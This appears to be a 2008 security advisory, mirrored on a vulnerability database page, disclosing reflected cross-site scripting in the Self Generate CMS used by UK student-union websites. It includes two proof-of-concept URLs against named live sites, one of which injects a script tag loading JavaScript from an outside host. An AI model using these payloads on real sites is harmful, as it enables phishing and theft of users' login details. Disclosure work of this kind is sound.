Lucene search

K

selfgen-xss.txt

πŸ—“οΈΒ 24 Aug 2008Β 00:00:00Reported byΒ KaerastTypeΒ 
packetstorm
Β packetstorm
πŸ”—Β packetstormsecurity.comπŸ‘Β 20Β Views

Vulnerability in Self Generate CMS system allows injection of arbitrary html/javascript code into browser session leading to potential phishing attacks

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`Release Date: August 23 2008  
Platform: Web  
Severity: Important  
Summary:  
  
Bam host a large number of websites for student unions throughout the  
uk using a custom cms system called Self Generate. This vulnerability  
affects all of these websites and allows attackers to inject arbitrary  
html/javascript code into a browser session.  
  
Status:  
  
We have been unable to contact BamUK, SU Marketing, or Self Generate  
about this vulnerability. They have no email addresses listed and their  
contact form consistently returns error messages.  
  
Details:  
  
There are various instances throughout the cms system where html code  
can be injected into the page. The majority of these instances are  
where β€˜page’ is passed as a GET value, eg. page=injected_data, which is  
improperly cleaned before being displayed in the sidebar. Successful  
exploitation of this could lead to users giving away their login  
details through a cleverly crafted url sent in a phishing email.  
  
Poc:  
http://www.ubuonline.co.uk/games/?referrer=main&page=%22%3E%3Cscript%20src=http://vuln.xssed.net/thirdparty/scripts/ckers.org.js%3E%3C/script%3E  
  
http://www.hullstudent.com/content/?page=%22%3Cscript%3Ealert(document.location)%3C/script%3E&text_only=2  
  
Recommendations:  
  
Use existing contacts at Bam/Self Generate to ask whether your website  
is secure against all attacks (including xss and sql injection), and  
not just the ones we discovered today. We believe that since the code  
is heavily reused across all websites, it should be a relatively simple  
fix following a full code audit.  
  
Users may also consider switching to an alternative cms system hosted  
inhouse which would make security auditing and fixing of bugs like  
these much easier.  
  
--   
Kærast  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo